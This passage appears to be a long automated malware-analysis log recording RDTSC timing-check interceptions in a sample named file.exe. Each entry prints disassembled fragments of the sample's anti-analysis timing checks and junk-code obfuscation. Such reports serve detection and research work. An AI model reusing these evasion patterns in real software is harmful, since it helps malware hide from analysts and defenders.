                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E507DB second address: E507E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5093D second address: E50941 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E50941 second address: E5094B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E509F2 second address: E50A0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408F9688Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007F5408F96886h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E50A0C second address: E50A24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408C21114h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E50A24 second address: E50A29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E50A29 second address: E50A2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E50A2F second address: E50A57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 sub edx, 01146E92h 0x0000000e push 00000000h 0x00000010 sub dword ptr [ebp+122D1DC4h], edi 0x00000016 push 936BD181h 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F5408F9688Bh 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E50A57 second address: E50A5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E50AEF second address: E50B4B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408F96895h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 1ACACF1Ah 0x00000010 mov dword ptr [ebp+122D1C2Ch], ebx 0x00000016 lea ebx, dword ptr [ebp+12452568h] 0x0000001c push 00000000h 0x0000001e push ebp 0x0000001f call 00007F5408F96888h 0x00000024 pop ebp 0x00000025 mov dword ptr [esp+04h], ebp 0x00000029 add dword ptr [esp+04h], 00000017h 0x00000031 inc ebp 0x00000032 push ebp 0x00000033 ret 0x00000034 pop ebp 0x00000035 ret 0x00000036 adc dx, A8C0h 0x0000003b cmc 0x0000003c xchg eax, ebx 0x0000003d push eax 0x0000003e push edx 0x0000003f jg 00007F5408F96888h 0x00000045 pushad 0x00000046 popad 0x00000047 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E50B4B second address: E50B6C instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5408C21108h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007F5408C21112h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E50B6C second address: E50B72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E70ED3 second address: E70ED9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E70ED9 second address: E70EFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 jmp 00007F5408F96898h 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E70EFE second address: E70F04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6EE0D second address: E6EE2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408F9688Fh 0x00000007 pushad 0x00000008 jmp 00007F5408F9688Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6EF7D second address: E6EF81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6EF81 second address: E6EF8B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6F0D4 second address: E6F0DC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6F3C2 second address: E6F3CC instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5408F96886h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6F3CC second address: E6F3DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F5408C2110Ah 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6F3DE second address: E6F3E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6F3E4 second address: E6F400 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408C21116h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6F400 second address: E6F40A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F5408F96886h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6F40A second address: E6F40E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6F7CA second address: E6F7D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6F7D0 second address: E6F7F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a push edx 0x0000000b pop edx 0x0000000c jmp 00007F5408C21110h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push edx 0x00000017 pop edx 0x00000018 push edx 0x00000019 pop edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6F7F5 second address: E6F7F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6F7F9 second address: E6F7FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6F7FF second address: E6F805 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6F805 second address: E6F81F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5408C21115h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6F81F second address: E6F825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6F971 second address: E6F985 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408C21110h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6FAFC second address: E6FB0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jbe 00007F5408F96886h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6FB0D second address: E6FB11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6FC48 second address: E6FC59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jne 00007F5408F96886h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6FC59 second address: E6FC78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F5408C2110Bh 0x0000000f jc 00007F5408C2110Eh 0x00000015 push edx 0x00000016 pop edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6FC78 second address: E6FC80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6FC80 second address: E6FC84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6FDC7 second address: E6FDD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F5408F96886h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6FDD1 second address: E6FDE1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007F5408C21106h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E48A84 second address: E48A88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E70055 second address: E70068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5408C2110Eh 0x00000009 pop ebx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E705DD second address: E705E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E705E1 second address: E705F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jne 00007F5408C21106h 0x0000000d jbe 00007F5408C21106h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E705F6 second address: E70601 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E70601 second address: E70617 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5408C21106h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007F5408C21106h 0x00000014 push edx 0x00000015 pop edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E70617 second address: E7061B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E70904 second address: E7090E instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5408C21106h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7090E second address: E70917 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E70917 second address: E70920 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E37BD1 second address: E37BE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 je 00007F5408F96892h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E37BE2 second address: E37C09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F5408C21106h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5408C21117h 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E37C09 second address: E37C0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E37C0E second address: E37C2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5408C21119h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E37C2B second address: E37C48 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F5408F96891h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E79512 second address: E7954B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5408C2110Eh 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jns 00007F5408C21106h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F5408C21110h 0x00000017 jmp 00007F5408C21117h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7B7E9 second address: E7B7ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7B7ED second address: E7B804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F5408C2110Fh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7EA9D second address: E7EADD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408F96891h 0x00000007 jmp 00007F5408F9688Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 jmp 00007F5408F9688Bh 0x00000015 jno 00007F5408F96886h 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 jne 00007F5408F96886h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7EADD second address: E7EAE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7EAE1 second address: E7EAE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7ED7B second address: E7ED81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7F2B9 second address: E7F2BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7F2BD second address: E7F2C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E80D54 second address: E80D5B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E81165 second address: E8116B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8116B second address: E81170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E81268 second address: E8127F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408C2110Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push ebx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8179A second address: E8179E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E81936 second address: E8193C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E81B93 second address: E81B98 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E81B98 second address: E81B9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E81B9E second address: E81BB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F5408F9688Ch 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E81BB4 second address: E81BB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E81C83 second address: E81C96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5408F9688Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E82306 second address: E82322 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5408C21118h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E82322 second address: E82326 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E83EE7 second address: E83EED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E835AC second address: E835B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E83EED second address: E83EF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E835B9 second address: E835BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E868FC second address: E86903 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E85235 second address: E85250 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5408F96897h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8E398 second address: E8E39E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8F4E4 second address: E8F4E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8F583 second address: E8F589 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8E661 second address: E8E674 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408F9688Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8E674 second address: E8E67A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E925B1 second address: E925C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007F5408F96886h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9162A second address: E9163D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5408C2110Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E90728 second address: E90730 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E925C2 second address: E925D7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F5408C2110Dh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E93829 second address: E93836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jns 00007F5408F96886h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E95574 second address: E9557A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9557A second address: E955B2 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5408F96888h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov ebx, dword ptr [ebp+122D276Ch] 0x00000013 push 00000000h 0x00000015 or edi, 672A7537h 0x0000001b push 00000000h 0x0000001d pushad 0x0000001e push ecx 0x0000001f cld 0x00000020 pop esi 0x00000021 jnc 00007F5408F9688Ch 0x00000027 popad 0x00000028 mov bx, dx 0x0000002b push eax 0x0000002c push esi 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E96452 second address: E96457 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9579D second address: E957A2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E97398 second address: E97428 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408C2110Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov ebx, dword ptr [ebp+122D234Dh] 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push ebp 0x00000017 call 00007F5408C21108h 0x0000001c pop ebp 0x0000001d mov dword ptr [esp+04h], ebp 0x00000021 add dword ptr [esp+04h], 0000001Ah 0x00000029 inc ebp 0x0000002a push ebp 0x0000002b ret 0x0000002c pop ebp 0x0000002d ret 0x0000002e mov bl, 13h 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push ebp 0x00000035 call 00007F5408C21108h 0x0000003a pop ebp 0x0000003b mov dword ptr [esp+04h], ebp 0x0000003f add dword ptr [esp+04h], 00000015h 0x00000047 inc ebp 0x00000048 push ebp 0x00000049 ret 0x0000004a pop ebp 0x0000004b ret 0x0000004c mov dword ptr [ebp+122D1820h], edx 0x00000052 xchg eax, esi 0x00000053 pushad 0x00000054 pushad 0x00000055 jmp 00007F5408C21116h 0x0000005a pushad 0x0000005b popad 0x0000005c popad 0x0000005d push eax 0x0000005e push edx 0x0000005f jmp 00007F5408C2110Ch 0x00000064 rdtsc
